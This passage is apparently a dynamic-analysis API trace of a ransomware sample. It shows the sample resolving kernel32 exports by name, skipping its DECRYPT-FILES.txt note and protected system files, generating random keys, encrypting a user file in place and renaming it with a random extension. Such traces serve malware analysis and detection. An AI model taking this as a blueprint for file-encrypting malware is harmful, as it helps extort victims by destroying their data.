lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0080.345] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0080.345] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0080.345] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0080.345] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0080.345] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0080.345] lstrlenA (lpString="CREATETHREAD") returned 12 [0080.345] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0080.345] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0080.345] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0080.345] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0080.345] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0080.346] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0080.346] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0080.346] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0080.346] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0080.346] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0080.346] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0080.346] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0080.346] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0080.346] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0080.346] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0080.346] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0080.346] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0080.346] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0080.346] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0080.346] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0080.346] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0080.346] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0080.346] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0080.346] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0080.346] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0080.346] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0080.346] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0080.346] lstrlenA (lpString="CTRLROUTINE") returned 11 [0080.346] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0080.346] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0080.346] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0080.346] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0080.346] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0080.346] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0080.346] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0080.346] lstrlenA (lpString="DEBUGBREAK") returned 10 [0080.346] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0080.346] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0080.346] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0080.346] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0080.346] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0080.346] lstrlenA (lpString="DECODEPOINTER") returned 13 [0080.347] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0080.347] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0080.347] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0080.347] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0080.347] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0080.347] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0080.347] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0080.347] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0080.347] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0080.347] lstrlenA (lpString="DELETEATOM") returned 10 [0080.347] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0080.347] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0080.347] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0080.347] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0080.347] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0080.347] lstrlenA (lpString="DELETEFIBER") returned 11 [0080.347] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0080.347] lstrlenA (lpString="DELETEFILEA") returned 11 [0080.347] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0080.347] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0080.347] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0080.347] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0080.347] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0080.347] lstrlenA (lpString="DELETEFILEW") returned 11 [0080.347] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0080.347] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0080.347] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0080.347] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0080.347] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0080.347] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0080.347] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0080.347] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0080.347] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0080.347] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0080.347] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0080.347] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0080.347] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0080.347] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0080.348] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0080.348] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0080.348] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0080.348] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0080.348] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0080.348] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0080.348] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0080.348] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0080.348] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0080.348] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0080.348] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0080.348] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0080.348] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0080.348] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0080.348] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0080.348] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0080.348] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0080.348] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0080.348] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0080.348] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0080.348] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0080.348] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0080.348] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0080.348] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0080.348] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0080.348] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0080.348] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0080.348] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0080.348] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0080.348] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0080.348] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0080.348] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0080.348] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0080.348] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0080.348] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0080.348] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0080.348] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0080.349] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0080.349] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0080.349] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0080.349] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0080.349] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0080.349] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0080.349] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0080.349] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0080.349] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0080.349] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0080.349] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0080.349] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0080.349] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0080.349] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0080.349] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0080.349] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0080.349] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0080.349] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Compressed (zipped) Folder.ZFSendToTarget") returned 112 [0080.349] wsprintfW (in: param_1=0x3f2d730, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Compressed (zipped) Folder.ZFSendToTarget.yM1yQ") returned 118 [0080.349] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Compressed (zipped) Folder.ZFSendToTarget" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\compressed (zipped) folder.zfsendtotarget"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Compressed (zipped) Folder.ZFSendToTarget.yM1yQ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\compressed (zipped) folder.zfsendtotarget.ym1yq"), dwFlags=0x0) returned 1 [0080.350] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.350] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.350] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.351] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac135240, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac135240, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac135240, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0080.351] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0080.351] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x28d97bc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d97bc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3bb52ab9, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop (create shortcut).DeskLink", cAlternateFileName="DESKTO~1.DES")) returned 1 [0080.351] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink", lpString2="DECRYPT-FILES.txt") returned 1 [0080.351] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink", lpString2="autorun.inf") returned 1 [0080.351] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink", lpString2="boot.ini") returned 1 [0080.351] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink", lpString2="desktop.ini") returned -1 [0080.351] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink", lpString2="ntuser.dat") returned -1 [0080.351] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink", lpString2="iconcache.db") returned -1 [0080.351] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink", lpString2="bootsect.bak") returned 1 [0080.351] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink", lpString2="ntuser.dat.log") returned -1 [0080.351] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink", lpString2="thumbs.db") returned -1 [0080.351] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink", lpString2="Bootfont.bin") returned 1 [0080.351] lstrlenW (lpString="Desktop (create shortcut).DeskLink") returned 34 [0080.351] lstrcmpiW (lpString1="DeskLink", lpString2="lnk") returned -1 [0080.351] lstrcmpiW (lpString1="DeskLink", lpString2="exe") returned -1 [0080.351] lstrcmpiW (lpString1="DeskLink", lpString2="sys") returned -1 [0080.351] lstrcmpiW (lpString1="DeskLink", lpString2="dll") returned -1 [0080.351] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\") returned 71 [0080.351] lstrlenW (lpString="Desktop (create shortcut).DeskLink") returned 34 [0080.351] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\" [0080.351] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpString2="Desktop (create shortcut).DeskLink" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Desktop (create shortcut).DeskLink") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Desktop (create shortcut).DeskLink" [0080.351] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.351] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Desktop (create shortcut).DeskLink" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\desktop (create shortcut).desklink"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x458 [0080.352] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x3f2d6f8 | out: lpFileSize=0x3f2d6f8*=7) returned 1 [0080.352] CreateFileMappingW (hFile=0x458, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x45c [0080.352] MapViewOfFile (hFileMappingObject=0x45c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0080.353] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0080.353] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0080.353] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0080.354] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d660*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d660*=0x100) returned 1 [0080.354] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0080.355] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.355] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0080.355] CloseHandle (hObject=0x45c) returned 1 [0080.355] SetFilePointerEx (in: hFile=0x458, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.355] WriteFile (in: hFile=0x458, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d680, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d680*=0x108, lpOverlapped=0x0) returned 1 [0080.356] CloseHandle (hObject=0x0) returned 0 [0080.356] CloseHandle (hObject=0x458) returned 1 [0080.357] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.357] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.357] GetTickCount () returned 0x114c939 [0080.357] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.358] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0080.358] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0080.358] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0080.358] lstrlenA (lpString="kernel32.dll") returned 12 [0080.358] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0080.358] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0080.358] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0080.358] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0080.358] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0080.358] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0080.358] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0080.358] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0080.359] lstrlenA (lpString="ADDATOMA") returned 8 [0080.359] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0080.359] lstrlenA (lpString="ADDATOMW") returned 8 [0080.359] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0080.359] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0080.359] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0080.359] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0080.359] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0080.359] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0080.359] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0080.359] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0080.359] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0080.359] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0080.359] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0080.359] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0080.359] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0080.359] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0080.359] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0080.359] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0080.359] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0080.359] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0080.359] lstrcpyA (in: 